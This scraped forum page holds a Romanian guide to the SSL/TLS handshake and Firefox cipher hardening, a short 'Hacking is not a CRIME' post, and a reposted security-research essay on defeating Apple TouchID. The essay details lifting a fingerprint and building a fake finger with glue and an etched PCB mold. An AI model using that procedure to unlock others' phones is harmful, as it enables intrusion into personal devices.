SSL/TLS Nu vreau ca acest articol sa se transforme despre un articol SSL/TLS, dar trebuie sa precizez cateva lucruri de baza. SSL/TLS sunt niste protocoale, mai exact sunt niste reguli care trebuie indeplinite pentru a se putea realiza o conexiune sigura intre calculatorul vostru si site-ul pe care il vizitati. TLS e practic o versiune imbunatatita a SSL-ului. Versiunile SSL 1.0, 2.0 si 3.0 sunt vechi si nu ar mai trebui folosite, mai ales deoarece e cunoscut faptul ca au probleme de securitate. TLS 1.0 e o versiune imbunatatita de SSL 3.0 iar TLS 1.1 si TLS 1.2 sunt versiuni mai noi de TLS. Realizarea unei conexiuni SSL se face astfel: 1. Se realizeaza conexiunea TCP (nu intru in detalii) 2. Clientul (browser-ul) trimite "Client Hello" catre server. In request sunt specificate: versiunea SSL/TLS, de cele mai multe ori, default, TLS 1.0. Exemplu: TLS_DHE_RSA_WITH_AES_256_CBC_SHA 1. TLS = TLS sau SSL, protocolul 2. DHE = Diffie Hellman Exchange, algoritmul pentru schimbul de chei 3. RSA = Algoritmul folosit pentru autentificare 4. AES_256_CBC = Algoritmul folosit pentru encryptia simetrica (CBC e modul in care e folosit algoritmul AES pe blocuri) 5. SHA = Algoritmul folosit pentru validarea integritatii datelor (hash) 3. Serverul raspunde cu "Server Hello" in care raspunde cu versiunea suportata, de exemplu TLS 1.0 si cu cipher suite-ul (algoritmii folositi pentru encruptie) ales 4. Serverul trimite certificatul (sau certificatele), prin care se identifica. Mai exact, spune: "Uite, aceasta este dovada ca eu sunt www.cia.gov". Iar certificatul, pentru a fi recunoscut de browser ca fiind valid, trebuie sa fie semnat de catre o autoritate in domeniu: VeriSign sau alte companii recunoscute ca legitime pentru a semna certificate, deoarece si eu pot crea un certificat pentru domeniu "www.cia.gov", dar va fi semnat de Nytro, nu de VeriSign si probabil aveti mai multa incredere in ei decat in mine. 5. Clientul verifica daca certificatul este in regula, iar daca totul este ok, se face schimbul de chei. Adica se face encriptia asimetrica: se face schimbul de chei folosind algoritmul RSA (cred ca cel mai ok), DH (Diffie Hellman) sau ECDH (DH pe curbe eliptice) in functie de cipher-suite-ul ales de server din lista trimisa de client. x. Folosind cheile schimbate mai sus, se realizeaza encriptia datelor folosind algoritmul pentru criptarea simetrica (AES de exemplu) folosind cheile schimbate la "Key exchange". Dimensiunea cheilor depinde de cipher-suite. De exemplu, daca se foloseste AES pe 128 de biti, pentru a se "sparge" prin bruteforce datele trimise, e necesara incercarea a 2 ^ 128 (2 la puterea 128) de chei. Daca algoritmul este insa RC4, cum exista multe atacuri cunoscute impotriva acestui algoritm, sunt sanse mult mai mari ca o astfel de encriptie sa poata fi sparta intr-un timp mult mai scurt. Ce putem face? Dupa cum ziceam, in mod implicit, browserele trimit lista de cipher-suite completa iar serverul de obicei alege un algoritm simplu si rapid ca RC4, atat pentru viteza de incarcare a paginilor, cat si pentru compatibilitate cu browsere mai vechi. Noi il putem insa forta sa aleaga un cipher mai puternic prin simpla modificare a listei de cipher-suite-uri pe care browser-ul o trimite catre server, eliminand cipher-suite-urile "slabe" ca RC4. Setari in Mozilla Toate setarile pentru SSL se vor face navigand la pagina de configurare: about:config Pentru simplitate cautati: security.ssl Screenshot: De aici putem dezactiva anumite cipher suite-uri. Nu pot sa va spun cu certitudine care sunt sigure si care nu, dar va pot recomanda sa alegeti RSA (key exchange) si AES (pe 256 de biti). Eu am dezactivat tot in afara de RSA_AES_256_SHA: Puteti opta si pentru folosirea curbelor eliptice, in afara unui PRNG (Pseudo Random Number Generator) bazat pe curbe eliptice in care s-au descoperit probleme si se presupune ca ar putea fi un backdoor al celor de la NSA si in afara faptului ca NSA colaboreaza cu NIST (cei care definesc standardele de "siguranta") si ca astfel NSA ar putea influenta anumite curbe eliptice (de aceea am zis ca prefer RSA), puteti folosi curbe eliptice deoarece sunt mai putin consumatoare de procesor si mai "puternice". Rezultatul Inchidem browser-ul si il redeschidem si: Si suntem mai SIGURI. De asemenea, TLS 1.1 si TLS 1.2 sunt suportate de Firefox incepand cu Firefox 24 dar sunt DISABLED in mod implicit (probabil incomplet implementate). Pentru a le activa, in pagina de "about:config" cautati: security.tls Si modificati valorile: - security.tls.version.min = 0 (SSL 3.0) - security.tls.version.max = 1 (TLS 1.0) In valorile: - security.tls.version.min = 1 (TLS 1.0) - security.tls.version.max = 3 (TLS 1.2) IMPORTANT: Exista potibilitatea de a avea probleme cu stabilirea comunicatiei TLS pe servere mai vechi! In acest caz singura posibilitate este sa reactivati niste cipher-suite-uri mai slabe sau sa nu mai vizitati acel site. Daca aveti intrebari sau probleme le astept aici. Thanks, Nytro
  24. Nytro
    cum zice strofa asta: Hacking is not a CRIME - Si dedicatie speciala de la Nytro pentru toti dusmanii lui, pentru gaborii de peste tot!
  25. Nytro
    Why I Hacked Apple’s TouchID, And Still Think It Is Awesome. By Marc Rogers By now, the news is out —TouchID was hacked. In truth, none of us really expected otherwise. Fingerprint biometrics use a security credential that gets left behind everywhere you go on everything you touch. The fact that fingerprints can be lifted is not really up for debate— CSI technicians have been doing it for decades. The big question with TouchID was whether or not Apple could implement a design that would resist attacks using lifted fingerprints, or whether they would join the long line of manufacturers who had tried but failed to implement a completely secure solution. Does this mean TouchID is flawed and that it should be avoided? The answer to that isn’t as simple as you might think. Yes, TouchID has flaws, and yes, it’s possible to exploit those flaws and unlock an iPhone. But, the reality is these flaws are not something that the average consumer should worry about. Why? Because exploiting them was anything but trivial. Hacking TouchID relies upon a combination of skills, existing academic research and the patience of a Crime Scene Technician. First you have to obtain a suitable print. A suitable print needs to be unsmudged and be a complete print of the correct finger that unlocks a phone. If you use your thumb to unlock it, the way Apple designed it, then you are looking for the finger which is least likely to leave a decent print on the iPhone. Try it yourself. Hold an iPhone in your hand and try the various positions that you would use the phone in. You will notice that the thumb doesn’t often come into full contact with the phone and when it does its usually in motion. This means they tend to be smudged. So in order to “hack” your phone a thief would have to work out which finger is correct AND lift a good clean print of the correct finger. Next you have to “lift” the print. This is the realm of CSI. You need to develop the print using one of several techniques involving the fumes from cyanoacrylate (“super glue”) and a suitable fingerprint powder before carefully (and patiently) lifting the print using fingerprint tape. It is not easy. Even with a well-defined print, it is easy to smudge the result, and you only get one shot at this: lifting the print destroys the original. So now what? If you got this far, the chances are you have a slightly smudged print stuck to a white card. Can you use this to unlock the phone? This used to work on some of the older readers, but not for many years now, and certainly not with this device. To crack this control you will need to create and actual fake fingerprint. Creating the fake fingerprint is arguably the hardest part and by no means “easy.” It is a lengthy process that takes several hours and uses over a thousand dollars worth of equipment including a high resolution camera and laser printer. First of all, you have to photograph the print, remembering to preserve scale, maintain adequate resolution and ensure you don’t skew or distort the print. Next, you have to edit the print and clean up as much of the smudging as possible. Once complete, you have two options: The CCC method. Invert the print in software, and print it out onto transparency film using a laser printer set to maximum toner density. Then smear glue and glycerol on the ink side of the print and leave it to cure. Once dried you have a thin layer of rubbery dried glue that serves as your fake print. I used a technique demonstrated by Tsutomu Matsumoto in his 2002 paper “The Impact of Artificial “Gummy” Fingers on Fingerprint Systems”. In this technique, you take the cleaned print image and without inverting it, print it to transparency film. Next, you take the transparency film and use it to expose some thick copper clad photosensitive PCB board that’s commonly used in amateur electrical projects. After developing the image on the PCB using special chemicals, you put the PCB through a process called “etching” which washes away all of the exposed copper leaving behind a fingerprint mold. Smear glue over this and when it dries, you have a fake fingerprint. Using fake fingerprints is a little tricky; I got the best results by sticking it to a slightly damp finger. My supposition is that this tactic improves contact by evening out any difference in electrical conductivity between this and the original finger. So what do we learn from all this? Practically, an attack is still a little bit in the realm of a John le Carré novel. It is certainly not something your average street thief would be able to do, and even then, they would have to get lucky. Don’t forget you only get five attempts before TouchID rejects all fingerprints requiring a PIN code to unlock it. However, let’s be clear, TouchID is unlikely to withstand a targeted attack. A dedicated attacker with time and resources to observe his victim and collect data, is probably not going to see TouchID as much of a challenge. Luckily this isn’t a threat that many of us face. TouchID is not a “strong” security control. It is a “convenient” security control. Today just over 50 percent of users have any PIN on their smartphones at all, and the number one reason people give for not using the PIN is that it’s inconvenient. TouchID is strong enough to protect users from casual or opportunistic attackers (with one concern I will cover later on) and it is substantially better than nothing. Today, we have more sensitive data than ever before on our smart devices. To be honest, many of us should treat our smartphone like a credit card because you can perform many of the same financial transactions with it. Fingerprint security will help protect you against the three biggest threats facing smartphone users today: Fingerprint security will protect your data from a street thief that grabs your phone. Fingerprint security will protect you in the event you drop/forget/misplace your phone. Fingerprint security could protect you against phishing attacks (if Apple allows it) Fingerprint security has a darker side though: we need to carefully evaluate how its data is going to be managed and the impact it will have on personal privacy. First and foremost is the question of how fingerprint data will be managed. As Senator Al Franken pointed out to Apple in his letter dated September 19, we only have ten fingerprints and a stolen or public fingerprint could lead to lifelong challenges. Just imagine your fingerprints turning up at every crime scene in the country! The big questions here are: What data does Apple capture from a finger as it is enrolled? How is this data stored and how is it accessed? Can this data be used to recreate a user’s fingerprint mathematically or through visual reconstruction? In a similar fashion, fingerprints are viewed quite differently to passwords and PINs in the eyes of the law. For example, the police or other law enforcement officials can compel you to surrender your fingerprints, something they currently can’t do quite as easily with passwords or PINs despite some recent judicial challenges to that position. As a technology, fingerprint biometrics has a flaw that’s likely to be repeatedly exposed and fixed in future products. We shouldn’t let this distract us or make us think that fingerprint biometrics should be abandoned, instead we should ensure that future products and services are designed with this in consideration. If we play to its strengths and anticipate its weaknesses, fingerprint biometrics can add great value to both security and user experience. What I, and many of my colleagues are waiting for (with baited breath), is TouchID enabled two-factor authentication. By combining two low to medium security tokens, such as a fingerprint and a 4 digit pin, you create something much stronger. Each of these tokens has its flaws and each has its strengths. Two-factor authentication allows you to benefit from those strengths while mitigating some of the weaknesses. Imagine a banking application where on startup you use a fingerprint for convenience – it’s nice and quick and only needs to ensure the right person has started it. However as soon as you want to do something sensitive like check a balance or transfer some funds we kick it up a notch by asking for a two factor authentication – the fingerprint and a 4 digit pin. This combination is strong enough to protect the user against most scenarios from physical theft through to phishing attacks. If implemented correctly, TouchID enabled two-factor authentication in enterprise applications could be a good defense against phishing attacks by attackers like the Syrian Electronic Army. You can trick a user into giving up any kind of passcode but, it is much harder to trick a user into giving up his or her fingerprints from the other side of the world. Despite being hacked, TouchID is an exciting step forwards for smartphone security and I stand by our earlier blog on fingerprint security. Hacking TouchID gave me respect for its design and some ideas about how we can make it strong moving forward. I hope that Apple will keep in touch with the security industry as TouchID faces its inevitable growing pains. There is plenty of room for improvement, and an exciting road ahead of us if we do this right. For starters, Apple —can we have two-factor authentication please? Sursa: https://blog.lookout.com/blog/2013/09/23/why-i-hacked-apples-touchid-and-still-think-it-is-awesome/
×
×
  • Create New...